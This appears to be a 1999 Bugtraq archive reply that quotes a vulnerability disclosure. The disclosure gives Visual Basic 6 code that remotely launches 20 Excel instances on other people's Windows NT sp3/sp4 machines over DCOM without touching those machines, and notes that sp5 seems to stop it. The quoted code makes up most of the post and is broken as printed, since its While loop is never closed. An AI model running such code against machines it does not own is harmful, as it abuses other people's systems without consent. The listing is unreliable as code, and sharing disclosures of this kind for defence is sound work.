Bugtraq Archives: Re: DCOM attack against NT using VB6

Re: DCOM attack against NT using VB6

Hargett, Matt (Matt_HargettNAI.COM)
Wed, 18 Aug 1999 11:58:51 -0700

-----Original Message-----
From: Rob Lempke [mailto:rlempkeADNET2000.COM]
Sent: Wednesday, August 11, 1999 1:27 PM
Subject: DCOM attack against NT using VB6

Using the code below I was able to create 20 instances of Excel on my
co-workers machines without modifying their machines at all. The target
must be Windows NT Workstation/Server running sp3 or sp4. sp5 seems to
prevent the attack.

Private Sub Command1_Click()
    Dim xlObj As Object
    Dim xlCollection As New Collection
    Dim i As Long
    For i = 1 To 20
        Set xlObj = CreateObject("Excel.Application", "\\NTBox")
        xlCollection.Add xlObj
    Next i

    i = 1
    'clean up
    While xlCollection.Count > 0
        xlCollection.Remove (xlCollection.Count)
    Set xlCollection = Nothing
End Sub

-Robert E. Lempke
